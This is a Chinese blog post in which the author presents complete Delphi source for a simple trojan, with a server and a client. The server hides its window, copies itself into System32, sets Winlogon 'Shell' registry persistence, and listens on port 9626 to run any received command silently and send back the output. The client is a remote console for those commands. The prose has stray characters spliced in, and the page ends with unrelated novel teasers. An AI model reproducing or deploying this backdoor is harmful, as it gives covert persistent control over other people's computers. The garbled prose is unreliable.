2018-10-09 muma

使用Delphi編個(gè)木馬玩

板塊禁止發(fā)布 “電子書(shū)資料” ,此類(lèi)主題請(qǐng)發(fā)布至

剛學(xué)電腦時(shí)很喜歡網(wǎng)絡(luò)安全,看著高手們寫(xiě)的一個(gè)又一個(gè)攻擊工具坝初,自己也總想努力去學(xué)好編程去寫(xiě)屬于自己的程序树埠。學(xué)DELPHI快一年了,感覺(jué)什么都沒(méi)學(xué)到橘茉,慚愧啊。今晚突然想學(xué)著寫(xiě)木馬姨丈,于是手忙腳亂的敲了點(diǎn)代碼畅卓,超簡(jiǎn)單,愿自己能越寫(xiě)越好s瘛K杞椤!

程序跟傳統(tǒng)木馬一樣筋现,分服務(wù)端和客戶端唐础。運(yùn)行服務(wù)端后會(huì)復(fù)制自身到SYSTEM32目錄下面,并在注冊(cè)表添加一自動(dòng)行啟動(dòng)項(xiàng)矾飞,打開(kāi)本機(jī)9626端口開(kāi)始等待接收客戶端的數(shù)據(jù)一膨。當(dāng)接收到客戶端數(shù)據(jù)時(shí)就當(dāng)作CMD命令去執(zhí)行,最后把回顯傳送回客戶端洒沦”鳎客戶端很簡(jiǎn)單,跟服務(wù)端連接成功后申眼,輸入命令點(diǎn)執(zhí)行瞒津,正常的話可以收到服務(wù)端的執(zhí)行結(jié)果了。

源碼如下:

////Server.pas//////////////

unit UtMain;

////////////////////////////////////

//////////BY lanyus////////////////

////////Email:greathjw@163.com////

////////QQ:231221////////////////

///部分代碼從網(wǎng)上收集///////////

////////////////////////////////

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, Registry, ScktComp, StdCtrls;

type

TFmMain = class(TForm)

SS: TServerSocket;

Memo1: TMemo;

procedure FormCreate(Sender: TObject);

procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);

procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);

private

{ Private declarations }

public

{ Public declarations }

end;

var

FmMain: TFmMain;

reg:TRegistry;

implementation

{$R *.dfm}

procedure TFmMain.FormCreate(Sender: TObject);

var

sysdir:array[0..50] of char;

begin

Application.ShowMainForm:=False;

FmMain.Left:=-200;//運(yùn)行不顯示窗口

reg:=TRegistry.Create;

reg.RootKey:=HKEY_LOCAL_MACHINE;

reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);

if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then

reg.WriteString('Shell','Explorer.exe Lysvr.exe'); //建立開(kāi)機(jī)啟動(dòng)項(xiàng)

reg.Free;

GetSystemDirectory(sysdir,50);

if not FileExists(sysdir+'\Lysvr.exe') then

copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

SS.Port:=9626;

try

SS.Active:=True;

except

end;

end;

procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);

begin

Socket.SendText('連接成功'); //發(fā)現(xiàn)有連接時(shí)回傳‘連接成功 ’

end;

procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);

var

RemoteCmd:string;

hReadPipe,hWritePipe:THandle;

si:STARTUPINFO;

lsa:SECURITY_ATTRIBUTES;

pi:PROCESS_INFORMATION;

cchReadBuffer:DWORD;

ph:PChar;

fname:PChar;

res:string;

begin

Memo1.Clear;

remotecmd:=Socket.ReceiveText;

fname:=allocmem(255);

ph:=AllocMem(5000);

lsa.nLength:=sizeof(SECURITY_ATTRIBUTES);

lsa.lpSecurityDescriptor:=nil;

lsa.bInheritHandle:=True;

ifCreatePipe(hReadPipe,hWritePipe,@lsa,0)=falsethen

begin

socket.SendText('不能創(chuàng)建管道');

exit;

end;

fillchar(si,sizeof(STARTUPINFO),0);

si.cb:=sizeof(STARTUPINFO);

si.dwFlags:=(STARTF_USESTDHANDLESorSTARTF_USESHOWWINDOW);

si.wShowWindow:=SW_HIDE;

si.hStdOutput:=hWritePipe;

StrPCopy(fname,remotecmd);

/////執(zhí)行CMD命令////

if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then

begin

socket.SendText('不能創(chuàng)建進(jìn)程');

FreeMem(ph);

FreeMem(fname);

Exit;

end;

while(true)do

begin

ifnotPeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil)thenbreak;

ifcchReadBuffer<>0then

begin

ifReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=falsethenbreak;

ph[cchReadbuffer]:=chr(0);

Memo1.Lines.Add(ph);

end

else

if(WaitForSingleObject(pi.hProcess,0)=WAIT_OBJECT_0)thenbreak;

Sleep(100);

end;

ph[cchReadBuffer]:=chr(0);

Memo1.Lines.Add(ph);//memo接收回顯

CloseHandle(hReadPipe);

CloseHandle(pi.hThread);

CloseHandle(pi.hProcess);

CloseHandle(hWritePipe);

FreeMem(ph);

FreeMem(fname);

socket.SendText(Memo1.Text);///將回顯發(fā)送回客戶端

end;

end.

///////////////////////////////////////////////////////////////////////////////////////////

//////客戶端/////////////////////

unit UtMain;

///////////////////////////////////

//////////BY lanyus///////////////

////////Email:greathjw@163.com///

////////////////////////////////

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,

IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

type

TFmMain = class(TForm)

WebBrowser1: TWebBrowser;

Label3: TLabel;

Edit2: TEdit;

Label4: TLabel;

Edit3: TEdit;

Button2: TButton;

CS: TClientSocket;

Edit4: TEdit;

Label5: TLabel;

Memo1: TMemo;

BitBtn2: TBitBtn;

procedure Button2Click(Sender: TObject);

procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);

procedure BitBtn2Click(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

FmMain: TFmMain;

implementation

{$R *.dfm}

procedure TFmMain.Button2Click(Sender: TObject);

begin

CS.Host:=Edit2.Text;

CS.Port:=StrToInt(Edit3.Text);

CS.Open;

end;

procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);

begin

Memo1.Clear;

Memo1.Lines.Add(Socket.ReceiveText);

Memo1.Lines.Add('');

end;

procedure TFmMain.BitBtn2Click(Sender: TObject);

begin

CS.Socket.SendText(edit4.Text);

end;

end.

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末括尸,一起剝皮案震驚了整個(gè)濱河市巷蚪,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌濒翻,老刑警劉巖屁柏,帶你破解...
    沈念sama閱讀 206,602評(píng)論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異有送,居然都是意外死亡淌喻,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,442評(píng)論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門(mén)雀摘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)裸删,“玉大人,你說(shuō)我怎么就攤上這事阵赠⊙乃” “怎么了乘粒?”我有些...
    開(kāi)封第一講書(shū)人閱讀 152,878評(píng)論 0 344
  • 道士緝兇錄:失蹤的賣(mài)姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)伤塌。 經(jīng)常有香客問(wèn)我,道長(zhǎng)轧铁,這世上最難降的妖魔是什么每聪? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 55,306評(píng)論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮齿风,結(jié)果婚禮上药薯,老公的妹妹穿的比我還像新娘。我一直安慰自己救斑,他們只是感情好童本,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,330評(píng)論 5 373
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著脸候,像睡著了一般穷娱。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上运沦,一...
    開(kāi)封第一講書(shū)人閱讀 49,071評(píng)論 1 285
  • 城市分裂傳說(shuō)
    那天泵额,我揣著相機(jī)與錄音,去河邊找鬼携添。 笑死嫁盲,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的烈掠。 我是一名探鬼主播羞秤,決...
    沈念sama閱讀 38,382評(píng)論 3 400
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼左敌!你這毒婦竟也來(lái)了瘾蛋?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 37,006評(píng)論 0 259
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤矫限,失蹤者是張志新(化名)和其女友劉穎瘦黑,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體奇唤,經(jīng)...
    沈念sama閱讀 43,512評(píng)論 1 300
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡幸斥,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,965評(píng)論 2 325
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了咬扇。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片甲葬。...
    茶點(diǎn)故事閱讀 38,094評(píng)論 1 333
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖懈贺,靈堂內(nèi)的尸體忽然破棺而出经窖,到底是詐尸還是另有隱情坡垫,我是刑警寧澤,帶...
    沈念sama閱讀 33,732評(píng)論 4 323
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布画侣,位于F島的核電站冰悠,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏配乱。R本人自食惡果不足惜溉卓,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,283評(píng)論 3 307
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望搬泥。 院中可真熱鬧桑寨,春花似錦、人聲如沸忿檩。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,286評(píng)論 0 19
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)燥透。三九已至沙咏,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間班套,已是汗流浹背芭碍。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,512評(píng)論 1 262
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留孽尽,地道東北人窖壕。 一個(gè)月前我還...
    沈念sama閱讀 45,536評(píng)論 2 354
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長(zhǎng)得像杉女,于是被迫代替她去往敵國(guó)和親瞻讽。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,828評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容